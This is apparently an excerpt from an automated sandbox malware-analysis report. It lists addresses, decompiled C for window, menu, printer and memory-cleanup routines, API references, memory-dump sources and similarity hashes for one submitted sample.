                                                                                                                                                                                                                                                                                          0x001007bb
                                                                                                                                                                                                                                                                                          0x001007b7
                                                                                                                                                                                                                                                                                          0x001007b7
                                                                                                                                                                                                                                                                                          0x001007b7
                                                                                                                                                                                                                                                                                          0x001007c2
                                                                                                                                                                                                                                                                                          0x001007c4
                                                                                                                                                                                                                                                                                          0x001007c6
                                                                                                                                                                                                                                                                                          0x001007c8
                                                                                                                                                                                                                                                                                          0x001007c8
                                                                                                                                                                                                                                                                                          0x001007cb
                                                                                                                                                                                                                                                                                          0x001007cc
                                                                                                                                                                                                                                                                                          0x001007cc
                                                                                                                                                                                                                                                                                          0x001007c8
                                                                                                                                                                                                                                                                                          0x001007c6
                                                                                                                                                                                                                                                                                          0x001007eb
                                                                                                                                                                                                                                                                                          0x001007ed
                                                                                                                                                                                                                                                                                          0x001007f3
                                                                                                                                                                                                                                                                                          0x001007fb
                                                                                                                                                                                                                                                                                          0x001007fb
                                                                                                                                                                                                                                                                                          0x00100800
                                                                                                                                                                                                                                                                                          0x0010073b
                                                                                                                                                                                                                                                                                          0x00100741
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00100741
                                                                                                                                                                                                                                                                                          0x00100706
                                                                                                                                                                                                                                                                                          0x00100706
                                                                                                                                                                                                                                                                                          0x0010070c
                                                                                                                                                                                                                                                                                          0x0010070e
                                                                                                                                                                                                                                                                                          0x0010070e
                                                                                                                                                                                                                                                                                          0x00100716
                                                                                                                                                                                                                                                                                          0x00100716
                                                                                                                                                                                                                                                                                          0x0010071b
                                                                                                                                                                                                                                                                                          0x0010071b
                                                                                                                                                                                                                                                                                          0x00100805
                                                                                                                                                                                                                                                                                          0x0010080d
                                                                                                                                                                                                                                                                                          0x0010080e
                                                                                                                                                                                                                                                                                          0x0010080f
                                                                                                                                                                                                                                                                                          0x0010081d

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000406,00000000,?), ref: 00100730
                                                                                                                                                                                                                                                                                          • GetClientRect.USER32 ref: 0010075F
                                                                                                                                                                                                                                                                                          • GetWindowLongA.USER32 ref: 00100775
                                                                                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00100784
                                                                                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 0010078E
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000404,00000000,?), ref: 001007DF
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: MessageMetricsSendSystem$ClientLongRectWindow
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1858223077-0
                                                                                                                                                                                                                                                                                          • Opcode ID: a07de91e61f85e63d5e057f9c0eadc382ec0bda9661fd85568642445deebe584
                                                                                                                                                                                                                                                                                          • Instruction ID: 5b9f7ad670c58400cd8335f5a513eb1b0b459ebeb4a610b7b8747cfd16e7967d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a07de91e61f85e63d5e057f9c0eadc382ec0bda9661fd85568642445deebe584
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E518471A00209AFC725DFA8D989BAAB3F5FB4C700F50466DE596E3681D7B4A981CF40
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                                                                                                                          			E000F9910(intOrPtr _a4) {
                                                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                                          				signed int _t46;
                                                                                                                                                                                                                                                                                          				struct HENHMETAFILE__* _t50;
                                                                                                                                                                                                                                                                                          				struct HENHMETAFILE__* _t51;
                                                                                                                                                                                                                                                                                          				void* _t53;
                                                                                                                                                                                                                                                                                          				void* _t54;
                                                                                                                                                                                                                                                                                          				void* _t55;
                                                                                                                                                                                                                                                                                          				void* _t64;
                                                                                                                                                                                                                                                                                          				intOrPtr _t85;
                                                                                                                                                                                                                                                                                          				intOrPtr _t87;
                                                                                                                                                                                                                                                                                          				intOrPtr _t91;
                                                                                                                                                                                                                                                                                          				signed int _t94;
                                                                                                                                                                                                                                                                                          				void* _t95;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0010F8D6);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t46 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_push(_t46 ^ _t94);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_t91 = _a4;
                                                                                                                                                                                                                                                                                          				_v8 = 7;
                                                                                                                                                                                                                                                                                          				_t49 =  *((intOrPtr*)(_t91 + 0x52c));
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_t91 + 0x52c)) != 0) {
                                                                                                                                                                                                                                                                                          					E00105DE2(_t49);
                                                                                                                                                                                                                                                                                          					_t95 = _t95 + 4;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t91 + 0x52c)) = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t91 + 0x530)) = 0;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t91 + 0x534)) = 0;
                                                                                                                                                                                                                                                                                          				_t50 =  *(_t91 + 0x510);
                                                                                                                                                                                                                                                                                          				if(_t50 != 0) {
                                                                                                                                                                                                                                                                                          					DeleteEnhMetaFile(_t50);
                                                                                                                                                                                                                                                                                          					 *(_t91 + 0x510) = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t51 =  *(_t91 + 0x4f0);
                                                                                                                                                                                                                                                                                          				if(_t51 != 0) {
                                                                                                                                                                                                                                                                                          					DeleteEnhMetaFile(_t51);
                                                                                                                                                                                                                                                                                          					 *(_t91 + 0x4f0) = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_t91 + 0x4ec)) != 0) {
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t91 + 0x4ec)) = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t52 =  *((intOrPtr*)(_t91 + 0x4d8));
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_t91 + 0x4d8)) != 0) {
                                                                                                                                                                                                                                                                                          					E00105701(_t52);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t53 =  *(_t91 + 0x4bc);
                                                                                                                                                                                                                                                                                          				if(_t53 != 0) {
                                                                                                                                                                                                                                                                                          					GlobalUnlock(_t53);
                                                                                                                                                                                                                                                                                          					GlobalFree( *(_t91 + 0x4bc));
                                                                                                                                                                                                                                                                                          					 *(_t91 + 0x4bc) = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t54 =  *(_t91 + 0x4b8);
                                                                                                                                                                                                                                                                                          				if(_t54 != 0) {
                                                                                                                                                                                                                                                                                          					ClosePrinter(_t54);
                                                                                                                                                                                                                                                                                          					 *(_t91 + 0x4b8) = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t85 = _t91 + 0x250;
                                                                                                                                                                                                                                                                                          				_v20 = _t85;
                                                                                                                                                                                                                                                                                          				_v8 = 8;
                                                                                                                                                                                                                                                                                          				_t55 =  *(_t85 + 0x4c);
                                                                                                                                                                                                                                                                                          				if(_t55 != 0 && DeleteObject(_t55) != 0) {
                                                                                                                                                                                                                                                                                          					 *(_t85 + 0x4c) = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				E000F7560(_t85 + 0x24);
                                                                                                                                                                                                                                                                                          				_v8 = 4;
                                                                                                                                                                                                                                                                                          				_t86 =  *((intOrPtr*)(_t85 + 0x14));
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_t85 + 0x14)) != 0) {
                                                                                                                                                                                                                                                                                          					E00105701(_t86);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t87 = _t91 + 0x224;
                                                                                                                                                                                                                                                                                          				_v20 = _t87;
                                                                                                                                                                                                                                                                                          				_v8 = 9;
                                                                                                                                                                                                                                                                                          				_push( *((intOrPtr*)(_t87 + 0x28)));
                                                                                                                                                                                                                                                                                          				E001062C2();
                                                                                                                                                                                                                                                                                          				_v8 = 3;
                                                                                                                                                                                                                                                                                          				_t88 =  *((intOrPtr*)(_t87 + 0x14));
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_t87 + 0x14)) != 0) {
                                                                                                                                                                                                                                                                                          					E00105701(_t88);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t60 =  *((intOrPtr*)(_t91 + 0x108));
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_t91 + 0x108)) != 0) {
                                                                                                                                                                                                                                                                                          					E00105DE2(_t60);
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t91 + 0x108)) = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t91 + 0x10c)) = 0;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t91 + 0x110)) = 0;
                                                                                                                                                                                                                                                                                          				_v8 = 1;
                                                                                                                                                                                                                                                                                          				E000FBA00(_t91 + 0x54);
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				_t64 = E000F5090(_t91 + 0x3c);
                                                                                                                                                                                                                                                                                          				_v8 = 0xffffffff;
                                                                                                                                                                                                                                                                                          				_t92 =  *((intOrPtr*)(_t91 + 0x14));
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_t91 + 0x14)) != 0) {
                                                                                                                                                                                                                                                                                          					_t64 = E00105701(_t92);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          				return _t64;
                                                                                                                                                                                                                                                                                          			}


















                                                                                                                                                                                                                                                                                          0x000f9913
                                                                                                                                                                                                                                                                                          0x000f9915
                                                                                                                                                                                                                                                                                          0x000f9920
                                                                                                                                                                                                                                                                                          0x000f9925
                                                                                                                                                                                                                                                                                          0x000f992c
                                                                                                                                                                                                                                                                                          0x000f9930
                                                                                                                                                                                                                                                                                          0x000f9936
                                                                                                                                                                                                                                                                                          0x000f9939
                                                                                                                                                                                                                                                                                          0x000f9940
                                                                                                                                                                                                                                                                                          0x000f994a
                                                                                                                                                                                                                                                                                          0x000f994d
                                                                                                                                                                                                                                                                                          0x000f9952
                                                                                                                                                                                                                                                                                          0x000f9955
                                                                                                                                                                                                                                                                                          0x000f9955
                                                                                                                                                                                                                                                                                          0x000f9961
                                                                                                                                                                                                                                                                                          0x000f9967
                                                                                                                                                                                                                                                                                          0x000f996d
                                                                                                                                                                                                                                                                                          0x000f9975
                                                                                                                                                                                                                                                                                          0x000f9978
                                                                                                                                                                                                                                                                                          0x000f997a
                                                                                                                                                                                                                                                                                          0x000f997a
                                                                                                                                                                                                                                                                                          0x000f9980
                                                                                                                                                                                                                                                                                          0x000f9988
                                                                                                                                                                                                                                                                                          0x000f998b
                                                                                                                                                                                                                                                                                          0x000f998d
                                                                                                                                                                                                                                                                                          0x000f998d
                                                                                                                                                                                                                                                                                          0x000f9999
                                                                                                                                                                                                                                                                                          0x000f999b
                                                                                                                                                                                                                                                                                          0x000f999b
                                                                                                                                                                                                                                                                                          0x000f99a1
                                                                                                                                                                                                                                                                                          0x000f99a9
                                                                                                                                                                                                                                                                                          0x000f99ac
                                                                                                                                                                                                                                                                                          0x000f99ac
                                                                                                                                                                                                                                                                                          0x000f99b1
                                                                                                                                                                                                                                                                                          0x000f99b9
                                                                                                                                                                                                                                                                                          0x000f99bc
                                                                                                                                                                                                                                                                                          0x000f99c9
                                                                                                                                                                                                                                                                                          0x000f99cf
                                                                                                                                                                                                                                                                                          0x000f99cf
                                                                                                                                                                                                                                                                                          0x000f99d5
                                                                                                                                                                                                                                                                                          0x000f99dd
                                                                                                                                                                                                                                                                                          0x000f99e0
                                                                                                                                                                                                                                                                                          0x000f99e6
                                                                                                                                                                                                                                                                                          0x000f99e6
                                                                                                                                                                                                                                                                                          0x000f99ec
                                                                                                                                                                                                                                                                                          0x000f99f2
                                                                                                                                                                                                                                                                                          0x000f99f5
                                                                                                                                                                                                                                                                                          0x000f99f9
                                                                                                                                                                                                                                                                                          0x000f99fe
                                                                                                                                                                                                                                                                                          0x000f9a0b
                                                                                                                                                                                                                                                                                          0x000f9a0b
                                                                                                                                                                                                                                                                                          0x000f9a12
                                                                                                                                                                                                                                                                                          0x000f9a17
                                                                                                                                                                                                                                                                                          0x000f9a1b
                                                                                                                                                                                                                                                                                          0x000f9a20
                                                                                                                                                                                                                                                                                          0x000f9a23
                                                                                                                                                                                                                                                                                          0x000f9a23
                                                                                                                                                                                                                                                                                          0x000f9a28
                                                                                                                                                                                                                                                                                          0x000f9a2e
                                                                                                                                                                                                                                                                                          0x000f9a31
                                                                                                                                                                                                                                                                                          0x000f9a38
                                                                                                                                                                                                                                                                                          0x000f9a39
                                                                                                                                                                                                                                                                                          0x000f9a3e
                                                                                                                                                                                                                                                                                          0x000f9a42
                                                                                                                                                                                                                                                                                          0x000f9a4a
                                                                                                                                                                                                                                                                                          0x000f9a4d
                                                                                                                                                                                                                                                                                          0x000f9a4d
                                                                                                                                                                                                                                                                                          0x000f9a52
                                                                                                                                                                                                                                                                                          0x000f9a5a
                                                                                                                                                                                                                                                                                          0x000f9a5d
                                                                                                                                                                                                                                                                                          0x000f9a65
                                                                                                                                                                                                                                                                                          0x000f9a65
                                                                                                                                                                                                                                                                                          0x000f9a6f
                                                                                                                                                                                                                                                                                          0x000f9a75
                                                                                                                                                                                                                                                                                          0x000f9a7b
                                                                                                                                                                                                                                                                                          0x000f9a7f
                                                                                                                                                                                                                                                                                          0x000f9a88
                                                                                                                                                                                                                                                                                          0x000f9a8b
                                                                                                                                                                                                                                                                                          0x000f9a90
                                                                                                                                                                                                                                                                                          0x000f9a97
                                                                                                                                                                                                                                                                                          0x000f9a9c
                                                                                                                                                                                                                                                                                          0x000f9a9f
                                                                                                                                                                                                                                                                                          0x000f9a9f
                                                                                                                                                                                                                                                                                          0x000f9aa7
                                                                                                                                                                                                                                                                                          0x000f9ab5

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • DeleteEnhMetaFile.GDI32(?), ref: 000F9978
                                                                                                                                                                                                                                                                                          • DeleteEnhMetaFile.GDI32(?), ref: 000F998B
                                                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(?,1F9A9BDF,?,?,?,?,?,0010F8D6,000000FF,?,000F982C), ref: 000F99BC
                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32 ref: 000F99C9
                                                                                                                                                                                                                                                                                          • ClosePrinter.WINSPOOL.DRV(?,1F9A9BDF,?,?,?,?,?,0010F8D6,000000FF,?,000F982C), ref: 000F99E0
                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 000F9A01
                                                                                                                                                                                                                                                                                            • Part of subcall function 00105DE2: HeapFree.KERNEL32(00000000,00000000,?,0010755E,00000000,?,?,00107A12,001063ED,?,?,?,000F1339,80070057), ref: 00105DF8
                                                                                                                                                                                                                                                                                            • Part of subcall function 00105DE2: GetLastError.KERNEL32(00000000,?,0010755E,00000000,?,?,00107A12,001063ED,?,?,?,000F1339,80070057), ref: 00105E0A
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Delete$FileFreeGlobalMeta$CloseErrorHeapLastObjectPrinter.Unlock
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3967346493-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 439c125f46390e0d42a0b04113d646cac8f0501652d8bdb655218c9dea0c400b
                                                                                                                                                                                                                                                                                          • Instruction ID: 957ea98ebe68b612e704264e09b7aadc97406ab8e3c490608d7f9d7f6a156329
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 439c125f46390e0d42a0b04113d646cac8f0501652d8bdb655218c9dea0c400b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB5180B1904B49DBC720DFA9C8C4B9AF7E9BB04300F54492DE69AD3A41C7B4B944DF51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                                                                                                                          			E00100430(void* __ecx, intOrPtr* __edx, void* __eflags) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                                          				struct tagPOINT _v24;
                                                                                                                                                                                                                                                                                          				long _v28;
                                                                                                                                                                                                                                                                                          				long _v32;
                                                                                                                                                                                                                                                                                          				long _v36;
                                                                                                                                                                                                                                                                                          				struct tagTPMPARAMS _v44;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v48;
                                                                                                                                                                                                                                                                                          				struct tagPOINT _v56;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _v64;
                                                                                                                                                                                                                                                                                          				struct tagTPMPARAMS* _v68;
                                                                                                                                                                                                                                                                                          				int _v72;
                                                                                                                                                                                                                                                                                          				long _v76;
                                                                                                                                                                                                                                                                                          				int _v80;
                                                                                                                                                                                                                                                                                          				intOrPtr _v84;
                                                                                                                                                                                                                                                                                          				void* _v88;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t54;
                                                                                                                                                                                                                                                                                          				struct HWND__** _t56;
                                                                                                                                                                                                                                                                                          				intOrPtr _t59;
                                                                                                                                                                                                                                                                                          				signed char _t62;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t65;
                                                                                                                                                                                                                                                                                          				int _t66;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t67;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t75;
                                                                                                                                                                                                                                                                                          				int _t80;
                                                                                                                                                                                                                                                                                          				void* _t105;
                                                                                                                                                                                                                                                                                          				int _t106;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t107;
                                                                                                                                                                                                                                                                                          				signed int _t109;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t54 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t54 ^ _t109;
                                                                                                                                                                                                                                                                                          				_t107 = __edx;
                                                                                                                                                                                                                                                                                          				_t56 =  *(__edx + 4);
                                                                                                                                                                                                                                                                                          				_t75 =  *_t56;
                                                                                                                                                                                                                                                                                          				_t105 = __ecx;
                                                                                                                                                                                                                                                                                          				_v56.x = _t56[6];
                                                                                                                                                                                                                                                                                          				_v56.y = _t56[9];
                                                                                                                                                                                                                                                                                          				MapWindowPoints(_t75, 0,  &_v56, 1);
                                                                                                                                                                                                                                                                                          				_t59 =  *((intOrPtr*)(_t107 + 4));
                                                                                                                                                                                                                                                                                          				_v24.x =  *(_t59 + 0x18);
                                                                                                                                                                                                                                                                                          				_v24.y =  *((intOrPtr*)(_t59 + 0x1c));
                                                                                                                                                                                                                                                                                          				_v16 =  *((intOrPtr*)(_t59 + 0x20));
                                                                                                                                                                                                                                                                                          				_v12 =  *((intOrPtr*)(_t59 + 0x24));
                                                                                                                                                                                                                                                                                          				MapWindowPoints(_t75, 0,  &_v24, 2);
                                                                                                                                                                                                                                                                                          				_t62 = E000F4890(_t75, _t105, _t107);
                                                                                                                                                                                                                                                                                          				asm("sbb ebx, ebx");
                                                                                                                                                                                                                                                                                          				_v36 = 0;
                                                                                                                                                                                                                                                                                          				_v44.rcExclude = 0;
                                                                                                                                                                                                                                                                                          				_v32 = 0;
                                                                                                                                                                                                                                                                                          				_v28 = 0;
                                                                                                                                                                                                                                                                                          				_v36 = _v24.y;
                                                                                                                                                                                                                                                                                          				_v44.rcExclude = _v24.x;
                                                                                                                                                                                                                                                                                          				_t80 = ( ~(_t62 & 0x000000ff) & 0xfffff000) + 0x00001000 | 0x00000040;
                                                                                                                                                                                                                                                                                          				_v44.cbSize = 0x14;
                                                                                                                                                                                                                                                                                          				_v32 = _v16;
                                                                                                                                                                                                                                                                                          				_v28 = _v12;
                                                                                                                                                                                                                                                                                          				_t65 = SendMessageA( *(_t105 + 4), 0x52d, 0, 0);
                                                                                                                                                                                                                                                                                          				_v48 = _t65;
                                                                                                                                                                                                                                                                                          				_t66 = IsWindow(_t65);
                                                                                                                                                                                                                                                                                          				_t67 =  *_t107;
                                                                                                                                                                                                                                                                                          				if(_t66 == 0) {
                                                                                                                                                                                                                                                                                          					_t106 = _v56.y;
                                                                                                                                                                                                                                                                                          					_v64 = _t67;
                                                                                                                                                                                                                                                                                          					_v48 =  *(_t105 + 4);
                                                                                                                                                                                                                                                                                          					return E001059E6(TrackPopupMenuEx(_v64, _t80, E00101BD0(_t106, _v56.x), _t106, _v48,  &_v44), _t80, _v8 ^ _t109, _t106, _t106, _v56.x);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v76 = _v56.x;
                                                                                                                                                                                                                                                                                          					_v72 = _v56.y;
                                                                                                                                                                                                                                                                                          					_v84 = _t67;
                                                                                                                                                                                                                                                                                          					_v88 = 0x18;
                                                                                                                                                                                                                                                                                          					_v80 = _t80;
                                                                                                                                                                                                                                                                                          					_v68 =  &_v44;
                                                                                                                                                                                                                                                                                          					return E001059E6(SendMessageA(_v48, 0x52f, 0,  &_v88), _t80, _v8 ^ _t109, _v48, _t105, _t107);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}




































                                                                                                                                                                                                                                                                                          0x00100436
                                                                                                                                                                                                                                                                                          0x0010043d
                                                                                                                                                                                                                                                                                          0x00100443
                                                                                                                                                                                                                                                                                          0x00100445
                                                                                                                                                                                                                                                                                          0x00100448
                                                                                                                                                                                                                                                                                          0x0010044a
                                                                                                                                                                                                                                                                                          0x0010044f
                                                                                                                                                                                                                                                                                          0x0010045e
                                                                                                                                                                                                                                                                                          0x00100461
                                                                                                                                                                                                                                                                                          0x00100467
                                                                                                                                                                                                                                                                                          0x0010046d
                                                                                                                                                                                                                                                                                          0x00100473
                                                                                                                                                                                                                                                                                          0x00100479
                                                                                                                                                                                                                                                                                          0x00100488
                                                                                                                                                                                                                                                                                          0x0010048b
                                                                                                                                                                                                                                                                                          0x00100491
                                                                                                                                                                                                                                                                                          0x001004a1
                                                                                                                                                                                                                                                                                          0x001004a7
                                                                                                                                                                                                                                                                                          0x001004ac
                                                                                                                                                                                                                                                                                          0x001004b5
                                                                                                                                                                                                                                                                                          0x001004b8
                                                                                                                                                                                                                                                                                          0x001004be
                                                                                                                                                                                                                                                                                          0x001004c4
                                                                                                                                                                                                                                                                                          0x001004d6
                                                                                                                                                                                                                                                                                          0x001004d9
                                                                                                                                                                                                                                                                                          0x001004e0
                                                                                                                                                                                                                                                                                          0x001004e3
                                                                                                                                                                                                                                                                                          0x001004e6
                                                                                                                                                                                                                                                                                          0x001004ed
                                                                                                                                                                                                                                                                                          0x001004f0
                                                                                                                                                                                                                                                                                          0x001004f8
                                                                                                                                                                                                                                                                                          0x001004fa
                                                                                                                                                                                                                                                                                          0x00100544
                                                                                                                                                                                                                                                                                          0x0010054a
                                                                                                                                                                                                                                                                                          0x0010054d
                                                                                                                                                                                                                                                                                          0x0010057c
                                                                                                                                                                                                                                                                                          0x001004fc
                                                                                                                                                                                                                                                                                          0x00100502
                                                                                                                                                                                                                                                                                          0x0010050b
                                                                                                                                                                                                                                                                                          0x00100511
                                                                                                                                                                                                                                                                                          0x0010051d
                                                                                                                                                                                                                                                                                          0x00100524
                                                                                                                                                                                                                                                                                          0x00100527
                                                                                                                                                                                                                                                                                          0x00100540
                                                                                                                                                                                                                                                                                          0x00100540

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • MapWindowPoints.USER32 ref: 00100461
                                                                                                                                                                                                                                                                                          • MapWindowPoints.USER32 ref: 0010048B
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F4890: _memset.LIBCMT ref: 000F48B1
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F4890: GetVersionExA.KERNEL32(?), ref: 000F48CA
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000052D,00000000,00000000), ref: 001004E6
                                                                                                                                                                                                                                                                                          • IsWindow.USER32(00000000), ref: 001004F0
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000052F,00000000,?), ref: 0010052A
                                                                                                                                                                                                                                                                                          • TrackPopupMenuEx.USER32(?,-00001000,00000000,?,?,00000014,?,00000000), ref: 00100566
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Window$MessagePointsSend$MenuPopupTrackVersion_memset
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 941122160-0
